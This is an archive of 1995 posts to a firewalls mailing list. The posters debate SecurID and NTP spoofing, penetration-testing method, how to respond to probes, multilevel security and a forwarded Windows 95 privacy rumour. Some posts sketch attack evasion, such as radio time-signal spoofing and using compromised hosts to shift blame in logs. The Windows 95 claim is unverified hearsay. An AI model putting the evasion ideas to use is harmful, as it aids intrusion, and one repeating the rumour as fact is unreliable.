From firewalls-owner Tue Aug 1 00:00:07 1995
From: waiming@salome.nsrc.nus.sg (Leong Wai Ming)
To: firewalls@greatcircle.com
Subject: Help: Secure data for dial-in
Date: Tue, 1 Aug 1995 09:00:38 -0700 (PDT)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

I'm new to this mailing list. Please pardon me if someone has asked the same question before.

The situation is like this: Site A (not on the internet) wants to connect to site B (on the internet) and run jobs there. But the data must be secured from site A to site B. Site B has a firewall.

May I know what is the best way to do it? Is using dial-in good enough? How do I ensure site A's data would not 'leak' to the internet on the way to site B? (This is assuming that the security system on site B is good enough for intruders.)

Please advise. Thank you.

Regards,
Wai Ming
email: waiming@nsrc.nus.sg

From firewalls-owner Tue Aug 1 02:01:24 1995
From: Danny Cox
Date: Tue, 1 Aug 1995 09:38:13 +0100
To: Firewalls@GreatCircle.COM
Subject: Re: Firewalls-Digest V4 #453

> The SMG (if that's what you're referring to) is a case in
> point. Give me one of the current SMGs and I can configure it to
> run TCP/IP over Email, and do NFS into and out of a classified
> environment. I believe this little loophole is being fixed but the
> whole problem is one of those "emperors new clothes" type deals.
> If you allow ANY large amounts of data in or out, I can run IP
> over it. Period. All you can do is make it slow and expensive. The
> long and short of the story is that it's a wasted effort. If the
> data needs to be absolutely secure: isolate it.
> mjr.

The notion of this bothers me. I don't understand it either, which doesn't help! :)

How can one run TCP/IP over email? Given a sendmail setup, using smtp etc., it's running via TCP/IP anyway. Could you explain a bit more please?
Thanks,
Danny

From firewalls-owner Tue Aug 1 04:02:14 1995
From: Phil Hands
Date: Tue, 01 Aug 1995 10:51:14 +0200
To: "Thomas V. Myers"
cc: Hal Lockhart, amoss@cs.huji.ac.il, firewalls@greatcircle.com
Subject: Re: Secure-ID & NTP vulnerabilities
In-reply-to: Your message of "Mon, 31 Jul 1995 20:15:50 EDT."

tvmyers@icdc.delcoelect.com said:
> It would seem especially far fetched in light of the number of
> amateur radio (HAM) operators who could pinpoint the location of the
> 'bogus' transmitter in a few hours (or less) and would probably enjoy
> doing it! The FCC could do the same job, of course! ;-) A
> transmitter strong enough to completely mask the real signal would
> show up like a search light at midnight to any reasonably competent
> triangulation team.

Let's say you have the aerial for your time receiver on the roof of your 10 story office building.

If I can get a transmitter within 3 meters of your aerial, then at ground level (30 meters away) the signal strength will be 1/100 that required to beat the real time signal --- this is likely to be getting towards the level of background noise (i.e. becoming undetectable).

You could probably make the transmitter the size of a cigarette packet (trailing a wire as an aerial), and catapult it onto the roof. Alternatively, a van in the car park, with a directional aerial pointed up at the receiver, would probably also be fairly undetectable.

The details are a bit vague, but you can see what I'm getting at --- I don't think that you can blithely assume that it is impossible to do this unnoticed.

Cheers, Phil.

From firewalls-owner Tue Aug 1 05:00:29 1995
From: vin@shore.net (Vin McLellan)
Date: Tue, 1 Aug 1995 07:58:15 -0500
To: firewalls@greatcircle.com
Cc: root@garrison.com, scott@zorch.sf-bay.org, hal@locus.com, Quentin.Fennessy@sematech.org, tvmyers@icdc.delcoelect.com
Subject: Re: Secure-ID and NTP vulnerabilities

Jeromie Jackson queried the List-ocracy:

> I would be interested in hearing comments from anyone in regards to
> what Secure-ID has done to make sure NTP spoofing does not cause
> denial-of-service attacks on their authentication boxes. Obviously if the
> time of the box gets moved forward or backward enough the keys & the
> authentication unit will fall out of sync & deny access.

A suggestion by Ches and smb (in The Book) that a NTP spoof/playback attack against "a time-based authentication device" (the patented basis for SecurID) could subvert the authenticator has established a FT sinecure in Security Dynamic's Customer Service Dept. It's like an endowed chair.

Mr. Jackson and others here were savvy enough to postulate a denial of service attack (a serious matter; but not a penetration.) Less-informed folk often presume that the SecurID has no defenses against timely manipulation.

Point of Info: SDI's core defense against time-spoof/playback lies in a secured and encrypted file of incoming SecurID card-codes and Greenwich time, written as each authentication call is received. A specific card-code is not accepted a second time, period. Any SecurID authentication calls (which carry an internal time-stamp) must display a Greenwich time-stamp later than, and properly sequential to, any previous call from that particular card.

Over the last six months, SDI has been niggled by a swarm of false rumors that an ACE/SecurID system was subverted and penetrated with time-spoof/playback in the nasty GE hacker attack last November. A security sage at Creative Strategies Research actually published this rumor as scriptural fact earlier this year -- but it's just not true, says GE.

Point of Info2: There has never been a credible report of an ACE/SecurID system being subverted and penetrated. There were no ACE authentication modules in the chain of systems the Thanksgiving Day hackers penetrated at GE. The several GE nets protected by ACE/SecurID user authentication were untouched. GE knows of no connection between the attack and any remote ACE/SecurID site. GE is buying more ACE/Servers.

As to Mr. Jackson's query: NTP is a total non-issue for that half of the SDI installed base which still use stand-alone ACE "authentication boxes" in hardware. The ACE hardware boxes have an internal clock, which is not dependent on any outside time source after it is initialized by SDI in pre-ship prep. These boxes ship with a program which adjusts for drift in the internal clock, as measured by SDI in the initialization process. Each ACE module also has code which allows it to record, calculate -- and adjust for -- any relative drift in the time-clock circuit of each SecurID card it authenticates. Remember: the ACE module only has to remain synchronized with the SecurIDs which call upon it, not the outside world -- and management of that sync is the heart of the patents which keep time-based two-factor authentication "tokens" an SDI monopoly.

In the most rapidly growing sector of SDI's business -- the SecurID client/server authentication apps SDI has shipped without competition for four years -- the risk of denial-of-service NTP attacks is real if minimal. And there are obvious solutions if, and when, it is considered a realistic threat.

Point of Info3: No version of ACE (hardware box or ACE/Server) requires NTP. The ACE/Server can depend quite comfortably upon its host's system clock, unsupported by NTP. Again, the time-sync that counts -- the relationship between the authentication server and the population of SecurIDs that call upon it -- is whole unto itself. At SDI corporate, the ACE/Server hosts just don't bother with NTP. Alternatively, as someone noted, you could set up an independent radio time-source (something SDI corporate is just getting around to.)

At sites where a CPU is dedicated to supporting an ACE authentication server, ignoring NTP is the painless solution. For sites which _must_ run NTP on the CPU which hosts the ACE/Server in order to support some specific service, there remains a potential for the denial of service attack Mr. Jackson cited: spoofing upstream NTP servers to corrupt the NTP feed (thus boosting the ACE/Server's clock out of synch with the clocks in its SecurID population.) And, yes, as a couple of imaginative folks noted, a pirate radio could potentially spoof radio time signals, albeit in a scenario far-fetched off the silver screen. So we go to an atomic clock?

> As stated in the FW&Inet security book, there is a cryptographic
> authentication mechanism for NTP, but there is still the vulnerability
> of the upstream servers being attacked.

At SDI, there is a feeling that spoofing a modern cryptographically-authenticated NTP feed is more difficult than has been suggested -- particularly if your NTP is set up to accept time only from specified and selected sources on the Net. (See "Protecting the Protectors," in The Book.) But it is not always easy to identify a trusted source, or to track back a chain of authenticated NTP demons, to guarantee a valid source at the genesis -- so with NTP, some risk (of denial of service, not penetration) exists, however diminished by careful and deliberate SysAdmin. Yet, as noted, alternative and secure set-up options exist, and they are not especially burdensome or expensive.

Mr. Jackson added:

> Does Secure-ID have some statement/document referencing this
> vulnerability? I would be interested in seeing it.

I'm working on it. Consider this a draft;-) SDI has hired the Privacy Guild to develop resource materials for their planned Website. This will be one of the questions addressed in the SecurID FAQ we are developing. (Suggestions for additional Qs to be addressed in the FAQ would be very welcome. Pls e-mail.)

Mark Verber jumped in to toss a few jabs at SDI:

> Security Dynamics does nothing to assure your clock is correct. If your
> time is compromised via NTP you are hosed.

It is true that the integrity and security of the CPU that hosts the authentication server is the responsibility of the SysAdmin, rather than SDI. But again, ACE "boxes" can't use NTP; and ACE/Servers don't need NTP. The ACE/Server is designed to limit the repercussions of a less than totally secure set-up to denial of service. For years, SDI engineers have toyed with the idea of a secure software clock integral to the ACE/Server code, but the spoof threat has not been deemed serious enough to warrant such an extension.

Denial of service is the universal risk. Acts of God; a Luddite employee; or a squirrel on the power line could knock you off-line. Worry about it all, of course -- not least, some error buried among the thousand variables in system and network set-ups -- but realistically, threats have to be ranked for proportional and rational countermeasures. SDI's feeling is: there are easier ways to knock most systems off the Net than by NTP spoofing. Even if someone has illicitly gained root on the machine that hosts an ACE/Server, messing with the system clock is a torturously round-about way of disabling SecurID access, when crashing your system does it neatly.

> In fact, not only do you create an immediate denial of service, but you
> also create a hassle for any user who tried to authenticate while the time
> was off because those accounts are marked to require the next login to do
> a double verify, e.g. they have to send the current card display, and then
> the next display of the card as soon as it rolls over.
This is a bother..

From firewalls-owner Tue Aug 1 05:37:54 1995
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Subject: Re: I open my big mouth... proxies for Oracle?
To: fwoyach@cais.cais.com (Frederick Woyach)
Date: Tue, 1 Aug 1995 07:59:32 -0500 (EST)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: from "Frederick Woyach" at Jul 31, 95 09:56:43 pm

> >You'll need to remember to allow xdmcp (udp/177), if the X terminals are
> >initially logging into an X server located on the 'internal' network,
> >however I would imagine that it would be preferable to keep any xdmcp
> >traffic external.
>
> UDP??

Yep.

- paul

Paul Ferguson, US Sprint, Managed Network Engineering, Reston, Virginia USA
tel: 703.689.6828
internet: paul@hawk.sprintmrn.com
http://www.sprintmrn.com

From firewalls-owner Tue Aug 1 07:00:40 1995
Date: Tue, 1 Aug 95 09:09:55 -0400
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: firewalls@greatcircle.com
Subject: Sidewinder Challenge

mjr rites:

> Rather than see "take a blindfolded shot at the system"
> firewalls tests, I'd rather see: "here is a detail of our design,
> take it and study the exact configuration you will be attacking
> and come back in a week with testing tools" approach. Anything
> else is security through obscurity, and hopefully we've learned
> that that's not very good.

I agree with Marcus, with the additional comment: periodically I get requests from people to "try to break into system xxxx and see if it is secure". I always refuse (maybe why I haven't been promoted in ten years), not because there are any doubts that it can be done, but because Things May Get Broken in the process.

The right way is to first study the system in question off line: the network configuration, the ACLs, the design rules. Once a good understanding of the concept is made, then study the policies involved (what? you don't have any? Then what am I testing? - always have a sample set when you say this BTW). Next examine the perimeter for "leaks" - conduct a modem sweep. Call the phone company and ask about leased lines. Sweep the network for unknown nodes (have *never* seen a paper list that was up-to-date - have even found entire unlisted subnets).

At this point you should not have to do any penetration testing; you should be able to predict all vulnerabilities. Of course you are going to need to demonstrate them since no-one will believe you, but there should not be any element of doubt: you should know.

However, while the Sidewinder challenge is somewhat flawed technically, it is good marketing, particularly when the target is people with money who know little/nothing about firewalls. You could have the best product in the world but it will fail in the marketplace without effective marketing, and I would rather see the sales go to a product with potential like Sidewinder from an in-depth company than to a one-trick-pony with a glossy GUI, as happened in the anti-virus market. But then what would I know, am not particularly successful.

Warmly,
Padgett

From firewalls-owner Tue Aug 1 08:26:44 1995
From: Mark_W_Loveless@smtp.bnr.com
Date: Tue, 01 Aug 95 08:58:34 CST
To: Mark Allyn (206) 860-9454
Cc: firewalls@GreatCircle.COM
Subject: Re[2]: Someone knocking at our door...

A one-sies/two-sies thing is a great cover. Here's what I mean:

From first.compromised.com "poke around" victim.com. Monitor first.compromised.com's admin mail, and see if the one-sies/two-sies attitude is working.

From second.compromised.com "poke around" victim.com, while performing a serious attack from third.compromised.com, making sure second.compromised.com gets any blame in log files. Minor screw-ups in the serious attack that leave traces will get blamed on the "poke around" guy.

You waste your time telling postmaster@second.compromised.com about victim.com's problems, especially if you receive a note stating "yes, we've found the guy, can you send log files, etc., and how he got it so we can see what he did and press charges". Do you know how many people have sent this info? Now the hacker learns a little more about your site, and more for the next victim.

The whois is where you should start, and possibly CERT immediately after. Traceroute is okay, but an outdial or two, especially through a compromised PBX, will cover that AND a quick phone trace.

NEVER assume anything. Call me paranoid if you will...

Mark

______________________________ Reply Separator _________________________________
Subject: Re: Someone knocking at our door...
Author: Mark Allyn (206) 860-9454 at internet
Date: 7/29/95 11:57 PM

I would wait and see if they do it again. I tend to ignore the one-sies and two-sies. They are not worth it. It was probably someone just poking around.

If they do persist, first send email to postmaster@whatever.com. If they are still at it after that, look up whatever.com at whois on the Internic. Call the technical or administrative contact listed. Try to reason it out with them. Ninety percent of the time, that would lick it.

If you are still frustrated at this point, do a traceroute to their IP address and attempt to identify the routers immediately before their net. Those routers are probably those of their upstream provider. Look up that name and/or IP address on Internic. Email/call the administrative contacts for the upstream provider. Complain that one of their downstream sites is causing you trouble. While you are at it, send a copy of your complaint to your own upstream provider. This way, they might go to bat for you (their customer) if the problems continue.

Mark Allyn
allyn@allyn.com
http://mark.allyn.com

From firewalls-owner Tue Aug 1 08:33:13 1995
Date: Tue, 1 Aug 95 09:32:02 -0400
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: firewalls@greatcircle.com
Subject: Multilevel systems

mjr rites again:

> This is indeed the classical view of distributed system security:
> 1) All data is important to some degree or another
> 2) All data should be separated from all other data
> to some degree or another
> 3) Most organizations don't separate their data at all
> Conclusion: therefore they are wrong
> Corollary: therefore they should use multilevel systems
...
> Conclusion: multilevel security systems suck
...
> That's a *PEOPLE* problem, not a software or hardware
> problem. Throwing multilevel security in isn't going to help that
> one bit. It's just a tool.
Is a superb posting, but Marcus makes one oversimplification - he seems to imply that multilevel security must be enforced at a single point and that there is nothing between single level (everybody trusts everyone) and multilevel (lots of compartments). I believe that there is a simpler but more effective scenario - distributed bilevel.

Once upon a time, every computer had a team of mystic gurus assigned to it for protection and it worked (mostly). Today we have thousands of computing elements that are much more difficult to control at that level. However the real points of separation remain, just are not at the nodes. "Blem wit" the current thinking is that the points of control are not at the firewall (at least in conventional thinking) either.

Back then the first computer in a corporation was used for finance and then personnel. Engineers did not have access, they had calculators and slide rules (still have mine 8*). Then engineers and secretaries started having computer access but the engineers used VAXes and the secretaries used PROFS so there was still a separation. It took years before anyone bothered to make ASCII-EBCDIC conversion a reality and then it was limited to JCL/TSO functions.

Our problem today is that suddenly we have put finance and engineering and executives and *everybody* into one big pot called "Enterprise". And are having problems such as Engineers looking at salaries in HR. Haquers get a lot of press but while a threat, are not a big one.

Trouble is that firewalls are a good answer to the outside threat but a *lousy* one for the inside problem. Multilevel separation is an inside answer but the firewall is not a good place to apply it. Instead the finance department needs its own simple firewall between it and the rest of the enterprise. Treated as a subnet and with the filter at the bridge is easy. Traffic is lower than on the net itself so does not impact. Since the concern is just inside1 vs inside2, the rules do not need to be complex.

A distributed answer based on rules established by the department/project is the right answer. And this is a *different* set of rules than are on the main firewall, a second layer of defense for sensitive areas, simple to apply and simple to maintain. Not single point multilevel but distributed bilevel.

Warmly,
Padgett

From firewalls-owner Tue Aug 1 09:23:56 1995
Date: Mon, 01 Aug 95 10:03:27 CST
From: "Bierdz, Philip"
To: peter@nmti.com, Rick Murphy
Cc: firewalls@greatcircle.com
Subject: Re[2]: Someone knocking at our door...

On 7/30/95 @ 8:39 PM Rick Murphy said:

> Unless you're desperate to meet new friends on the net (or to find new
> people whom you can annoy :-) there's little point in notifying anyone of
> the attempt. If it's persistent, however, it's worth notifying the owner of
> the site.
> If you're going to involve a postmaster in a suspected breakin attempt,
> you need a lot more evidence than a single probe - otherwise, you're
> wasting their time. If you're going to report it, at least give enough
> information to be useful to the site administrator - otherwise, you'll likely
> be ignored.
> -Rick

I don't believe so.
I'd contact the postmaster anyway (if you feel it was a valid probe). Being a postmaster myself, I'd like to know if a user was suspected of such a thing from any site. If I got enough calls from other sites with the same user as being "suspect"... I think we all get the point.

----------------------------------------------------------------------
Philip J. Bierdz
Senior Systems Support Specialist
Moraine Valley Community College
Palos Hills, IL - USA
bierdz@moraine.cc.il.us
DISCLAIMER: My opinions are not necessarily my own but those of my employer
----------------------------------------------------------------------

From firewalls-owner Tue Aug 1 09:31:23 1995
Date: Tue, 1 Aug 95 11:41:09 EST
From: "Kurt S. Plowman"
Subject: Re: silly, but????????
To: firewalls@greatcircle.com

> It was a security programmer that wrote the guardian.. This may make
> people think that all people that write security software (of which
> a firewall would directly translate to the same application) put backdoors
> in so that they can get access later..

Looks like another reason for access to the source code. :)

From firewalls-owner Tue Aug 1 10:06:54 1995
From: garys@baker.ds.boeing.com
Date: Tue, 1 Aug 1995 09:19:24 -0700
To: firewalls@greatcircle.com
Subject: "trusted" firewalls

1. "Trusted" products and systems. It seems that this term "trusted" carries STRONG emotional content! Let's try for the moment to place emotion aside and also to differentiate between the following:

   a. TCSEC (Orange book) evaluation classes (C2, B1, B2, etc) and

   b. A computer product that inspires confidence that it does what the vendor claims it does and that it is hard for me to make it do something it is not supposed to do.

2. There are a number of reasons why TCSEC 'trusted' products are not selling like hot-cakes. That fact bears _no_ relation on whether there is a need for "trustworthy" computer products - especially in the area of firewall functionality.

3. "Trusted" is NOT equal to Multi-level security (MLS). MLS capability is a function, and a system can inspire confidence without having MLS functionality.

4. The technology exists to produce "trustworthy" systems - and this technology wasn't new ten years ago. It is called software engineering - modularity, layering, data hiding, well defined interfaces, etc. The problem is that most software development appears to ignore basic software engineering principles, or does not apply them with enough rigor to provide any significant "trust". The result is that we get very functional products with a never ending string of security holes.

5. We are getting hung up on words (like trusted and MLS) and not seeing potential areas of agreement. Consider this example from the 94 Federal Criteria workshop. In one of the small groups we discussed commercial computer security needs. The representatives of a number of firms were in _strong_ agreement that there is NO need for labels. A few minutes later, these same individuals were in just as strong agreement that security "tags" are a definite need! "Label", "tag" - just different names for the same thing.

Cheers,
Gary

Gary R. Stoneburner
Boeing Information and Support Services
P.O. Box 24346, MS 7L-15
Seattle, WA 98124-0346
PHONE: 206-865-5603
FAX: 206-865-6903
EMAIL: garys@baker.ds.boeing.com
The opinions represented herein are not necessarily those of Boeing.
From firewalls-owner Tue Aug 1 10:08:15 1995
Date: Tue, 1 Aug 1995 12:28:21 -0400 (EDT)
From: Adam Safier
To: Warren Moore
cc: firewalls-digest
Subject: Re: Dial-in for Windows '95
In-Reply-To: <9507271435.AA1006@notes>

> Uh, excuse the dumb question, but in all seriousness why have an "insecure
> Network modem/terminal server" in the first place? Modem-pool dialin
> protection devices (e.g., Security Dynamics, Microframe, etc.) have been around
> forever, the majority work really well, support all sorts of advanced
> authentication devices, are reasonably priced, and allow asynch, sync, Dos,
> Unix, or whatever to be used. If it's a question of budget, I understand, but
> while cheap is good, proven is better.

It's a problem of having selected the low cost provider on a "bid" that had no security requirements - several years ago. I.e., the equipment chosen on the bid and put in place in several places is circa 1990 and low cost at that time. We already told the customer these modem servers did not have adequate security and a replacement should be evaluated. The client doesn't have an adequate security policy in place yet, so simply throwing new "security" boxes at them could also be a big waste of tax dollars and not meet real needs. For now we need to work with what we have in the field. (A security policy and architecture etc. are in development.)
Adam

My statements reflect my personal opinion which is not shared by my employer, wives, children.... or Freud.

From firewalls-owner Tue Aug 1 11:40:43 1995
Date: Tue, 1 Aug 1995 10:19:01 -0500 (CDT)
From: peter@nmti.com (Peter da Silva)
To: kaplan@bpa.arizona.edu (Ray Kaplan)
Cc: firewalls@GreatCircle.COM, peter@nmti.com
Subject: Re: Using multilevel systems for firewalls
Message-Id: <9508011519.AA27493@sonic.nmti.com.nmti.com>
In-Reply-To: from "Ray Kaplan" at Jul 31, 95 01:22:39 pm

> Yep. At the risk of sounding like I'm naive, I wonder if we (vendors,
> users, consultants....) come up with some definitive work that helps us
> get past the biggest obstacles: explaining to management why they are at
> risk and what they have to do about it?

I just pass around Cheswick's paper on Berferd. It's a pretty good convincer. I almost never have to pull out Cuckoo's Egg.
From firewalls-owner Tue Aug 1 11:41:07 1995
Date: Wed, 2 Aug 1995 02:56:06 +1000 (EST)
From: Darren Reed
To: craiga@Ipsilon.COM (Craig Anderson)
Cc: mjr@iwi.com, ray@skypoint.com, firewalls@greatcircle.com
Subject: Re: sidewinder challenge
Message-Id: <199508011659.JAA04749@miles.greatcircle.com>
In-Reply-To: <199508010155.SAA05111@servo.ipsilon.com> from "Craig Anderson" at Jul 31, 95 06:55:32 pm

In some mail from Craig Anderson, sie said:
> [Marcus Ranum here...]
> > Rather than see "take a blindfolded shot at the system"
> > firewalls tests, I'd rather see: "here is a detail of our design,
> > take it and study the exact configuration you will be attacking
> > and come back in a week with testing tools" approach. Anything
> > else is security through obscurity, and hopefully we've learned
> > that that's not very good. Can anyone disagree?
>
> So how about doing the Firewall industry equivalent of the NFS industry's
> week-long Inter-Op conference. No marketing weenies allowed, just technical
> people from each participating vendor attacking each other's machines to
> help improve the industry. No technical results will be published.
> If some vendor just wants free development help, don't help. Just
> point out to each other the weaknesses found.
As long as they don't mind a few of us who have non-commercial but otherwise the same interests coming along, it'd be a good thing, I think.

darren

From firewalls-owner Tue Aug 1 11:57:22 1995
Date: Tue, 1 Aug 95 10:56:11 CDT
From: root@garrison.com (Operator)
To: firewalls@greatcircle.com, vin@shore.net
Subject: Re: Secure-ID and NTP vulnerabilities
Message-Id: <9508011556.AA00357@garrison.com>

Thanks for the info in regards to Secure-ID & NTP vulnerabilities. I was wondering if you could address one of my, and my customers', concerns in regards to the keys themselves.

Several months ago, someone posted information in regards to SDI. They had stated that the 'pin#' was being sent plaintext, across the wire, as part of the 1-time password scheme. Is this still true, or was it ever? I have heard this problem exists with only certain cards (I believe the ones that don't have the pin#'s in order to access the card). Could you speak on this briefly?

Since the cards are distributed from SDI with unique qualities (the serial numbers), a disgruntled (sp!?) employee @ SDI, who knows the encryption algorithm, could breach security @ any customer site.
With the knowledge of the 'pin' of the card, the seed information (the unique qualifier of the card), & encryption algorithm in hand, the attacker could calculate what the password would be at a given time. I would assume that SDI had thought about this, and has somehow addressed the issue. To put me, as well as many other people's minds at rest, I would greatly appreciate hearing from you.

Jeromie Jackson
Garrison Associates
jeromie@garrison.com
---- Standard Disclaimer Applies ----

From firewalls-owner Tue Aug 1 12:01:44 1995
Date: Tue, 01 Aug 95 12:11:00 PDT
From: Garry Garrett
To: "'firewalls list from GreatCircle'"
Subject: RE: multilevel security in firewalls
Message-ID: <301E7C91@mailserv.abii.com>

Newbie alert!

Okay, I've seen the term "trusted system" bantered around. Can someone give me a quick explanation of what a trusted system is? Is this a term coined by some government security standard (like the "orange book", whatever that is [that's where these A1, B1, C2 standards come from, right?])?
I've seen references to trusted systems in "Practical Unix Security", a book I looked over and passed over in the bookstore because it was very dated and very BSD slanted (and I mostly do SYS V these days). I'm not sure that what they are calling a "trusted system" is the same thing to which you are referring.

Maybe this can be added to the FAQ's "Glossary of firewall related terms" section?

Garry

From firewalls-owner Tue Aug 1 12:38:34 1995
Date: 1 Aug 95 13:26:41 EDT
From: Eric Pederson
To: firewalls
Subject: NetSP wins Trust Award
Message-Id: <9508012027.AA4464@notes.mdor.state.mn.us>

The following information was forwarded to me by a pro-IBM guy. I'd appreciate comments from the list on both NetSP and the relevance of the announcement.

Thanks,
eric

--------
SOMERS, N.Y., July 31, 1995--IBM's Resource Access Control Facility (RACF) and NetSP Secured Logon Coordinator were recently named as winners in two categories of the InfoSecurity News Readers' Trust Awards. The magazine's readers selected NetSP as the best network security product and RACF as the best platform security product in the awards announced in the May/June issue.
Readers were asked to choose which product in each of 16 categories they trust the most. "These awards represent the opinions of information-security professionals who use these products in real-life situations," said Michael I. Sobol, InfoSecurity News publisher. "Our 28,000 readers know more about the technology and the products than anyone. These are the first awards to give the real experts in information security--our readers--a chance to name their favorite products."

From firewalls-owner Tue Aug 1 13:01:43 1995
Date: Tue, 1 Aug 1995 11:33:07 -0700
From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman)
To: firewalls@greatcircle.com
Subject: Huge gaping hole in Win95
Message-Id: <199508011833.LAA12779@sjsinc.com>

Folks:

1). Please see the posting below my sig line from comp.risks

2). I can imagine the following scenario:

- "*user*" thrilled with his new upgrade to Win95 runs out to Fry's, Egghead...and buys a modem unbeknownst to the security types.
- computer is also running a TCP/IP stack and PCNFS to access all of the corporate resources behind the firewall.
- "*user*" fires up MS-Network which then transmits the entire corporate filesystem topology to MicroSoft.
- security types never know that internal information has been severely compromised.

3). Am I wrong here??? I find the potential for this scenario both realistic and horrifying!!!!

4).
In addition to the security implications, this might actually be a way to tame the MS beast...if enough corporations get probed in this manner, the lawyers will have lots of fun putting together a class-action lawsuit to make MS (the original home of proprietary information and disclosures) much, much poorer for stealing trade secrets, copyrights, etc....ALAS...I love it....

5). I think this also has implications for the MS TCP/IP port discussion that has been going on on this list recently. I.e., as the article points out, if they have your filesystem structure and you are not blocking that port, they could grab any file that they want and you would never know it...

Regards,

b c++'ing u, %-)

sjs
-------------------------------------------------------------------------------
Stefan Jon Silverman - President                    SJS Associates, N.A., Inc.
                                                    572 Chestnut Street
Distributed Systems Architecture & Implementation   San Francisco, Ca. 94133
Phone: 415 989 2741                                 E-mail: sjs@sjsinc.com
Cell: 415 519 3494
-------------------------------------------------------------------------------
Weebles wobble, but they don't fall down!!!
-------------------------------------------------------------------------------

Date: 30 Jun 1995 07:47:48 U
From: "Paul Saffo"
Subject: Warning on Using Win95

From PLS_MCI_MAIL
FWD>>Warning on Using Win95

Date: 6/26/95 8:44 PM
From: jbreyer@accel.com
Subject: Warning on Using Win95

[Update on RISKS-17.13 item]

Believe it or not, this is not Net humor but serious. It would otherwise be outstanding satire!

Subject: Windows 95 Warning on comp.risks [RISKS-17.13], in Information Week

Microsoft officials confirm that beta versions of Windows 95 include a small viral routine called Registration Wizard. It interrogates every system on a network gathering intelligence on what software is being run on which machine.
It then creates a complete listing of both Microsoft's and competitors' products by machine, which it reports to Microsoft when customers sign up for Microsoft's Network Services, due for launch later this year.

"In Short" column, page 88, _Information Week_ magazine, May 22, 1995

The implications of this action, and the attitude of Microsoft to plan such action, beggars the imagination.

An update on this. A friend of mine got hold of the beta test CD of Win95, and set up a packet sniffer between his serial port and the modem. When you try out the free demo time on The Microsoft Network, it transmits your entire directory structure in background. This means that they have a list of every directory (and, potentially every file) on your machine. It would not be difficult to have something like a FileRequest from your system to theirs, without you knowing about it. This way they could get ahold of any juicy routines you've written yourself and claim them as their own if you don't have them copyrighted.

Needless to say, I'm rather annoyed about this. So spread the word as far and wide as possible: Steer clear of Windows 95. There's nothing to say that this "feature" will be removed in the final release.

[GML addition: Prodigy was accused of doing something similar several years ago. In that case it was not nearly as threatening due to: 1) it was limited to a single PC, 2) Prodigy couldn't do much with the info (i.e. they could not pursue you for copyright infringement, nor were they trying to expand into so many businesses the way Microsoft is).]
From firewalls-owner Tue Aug 1 13:15:42 1995
Date: Tue, 1 Aug 1995 15:55:11 -0400
From: wbunting@ch.inri.com (Bill Bunting)
To: firewalls@GreatCircle.COM
Subject: Protecting X.400 anyone?
Message-Id: <199508011955.PAA06109@hatteras.ch.inri.com>

Can anyone answer some/all of the following about X.400 in a firewalled environment?

* What are the best methods to protect X.400 and X.500?
* What is the best source of information on the WWW about X.400/X.500 and how it relates to firewalls?
* Do you use a proxy for X.400, something like SMAP, or what?
* What is the comms flow for X.400 using TCP/IP, i.e. ports in use and protocol information? (Where is this best documented [RFC ####, http:####]?)
* Is there any freeware or public domain source code available to protect X.400/X.500?
* Does anyone have any experience they would like to share about X.400/X.500?
* If I should have to develop an X.400 proxy/protector, which public domain implementation of X.400/X.500 (source code) is available/best?

Thank you,
-Bill.
-----------------------------------------
| Bill Bunting, Software Engineer       |
| Inter-National Research Institute, Inc.|
| 1441 Crossways Boulevard, Suite 102   |
| Chesapeake, Virginia 23320            |
| V(804)424-8675 F(804)420-4262         |
| (wbunting@inri.com)                   |
| (bunting@cs.odu.edu)                  |
| http://www.cs.odu.edu/~bunting        |
-----------------------------------------

From firewalls-owner Tue Aug 1 13:30:25 1995
Date: Tue, 1 Aug 1995 16:27:24 -0500
From: vin@shore.net (Vin McLellan)
To: firewalls@greatcircle.com
Cc: verber@parc.xerox.com
Subject: Re: SecurID & NTP vulnerabilities
Message-Id: <199508012025.AA09237@northshore.ecosoft.com>

(My apologies to the List and Mark Verber. Half my response to his comments about ACE/SecurId and NTP spoofing, below, was somehow cut from my earlier post. -vbm)

Mark Verber jumped in to toss a few jabs at SDI:

> Security Dynamics does nothing to assure your clock is correct. If your
> time is compromised via NTP you are hosed.

It is true that the integrity and security of the CPU that hosts the authentication server is the responsibility of the SysAdmin, rather than SDI. But again, ACE "boxes" can't use NTP; and ACE/Servers don't need NTP.
The ACE/Server is designed to limit the repercussions of a less than totally secure set-up to denial of service. For years, SDI engineers have toyed with the idea of a secure software clock integral to the ACE/Server code, but the spoof threat has not been deemed serious enough to warrant such an extension.

Denial of service is the universal risk. Acts of God; a Luddite employee; or a squirrel on the power line could knock you off-line. Worry about it all, of course -- not least, some error buried among the thousand variables in system and network set-ups -- but realistically, threats have to be ranked for proportional and rational countermeasures. SDI's feeling is: There are easier ways to knock most systems off the Net than by NTP spoofing. Even if someone has illicitly gained root on the machine that hosts an ACE/Server, messing with the system clock is a torturously round-about way of disabling SecurID access, when crashing your system does it neatly.

> In fact, not only do you create an immediate denial of service, but you
> also create a hassle for any user who tried to authenticate while the time
> was off because those accounts are marked to require the next login to do
> a double verify, e.g. they have to send the current card display, and then
> the next display of the card as soon as it rolls over. This is a bother
>

Ok, it's a bother -- but it is also an easy and utterly secure way to allow users to recover from this or several other host or card-based problems which can temporarily throw the integrity of the ACE/SecurID authentication exchange in doubt.

> and anyone who has scripted remote dialup, etc using SecurID most
> likely has not scripted for the second code to be sent.

Maybe you didn't script for a (generally transparent) second validation query, but thousands of firms that worked directly with SDI to set up their SecurID systems usually did. It's not hard.
It's also standard code for the 100-odd vendor firms that are currently working with SDI to provide API links to ACE off a huge variety of client/server apps.

(It is true, however, that for years SDI sold SecurID against the two-cycle challenge/response OTP tokens at least partially on the basis that SecurID authentication could be painlessly integrated into an established network -- with the piggybacked SecurID card-code and user PIN used in place of the static password. Hopefully, most of those sites eventually upgraded their network protocols.)

Apologies to all for the partial repost. Corrections, comments, or questions are always welcome. (Particularly if I can use them in the SecurID FAQ I'm to write for SDI.)

Suerte,
_Vin

-- -- -- -- -- -- -- -- -- --
Vin McLellan
The Privacy Guild
53 Nichols St.
Chelsea, MA 02150, USA
Tel. (617) 884-5548
=====================================================

From firewalls-owner Tue Aug 1 13:51:01 1995
Date: Tue, 1 Aug 1995 14:17:50 -0500
From: kaplan@bpa.arizona.edu (Ray Kaplan)
To: mulligan@future.incog.com
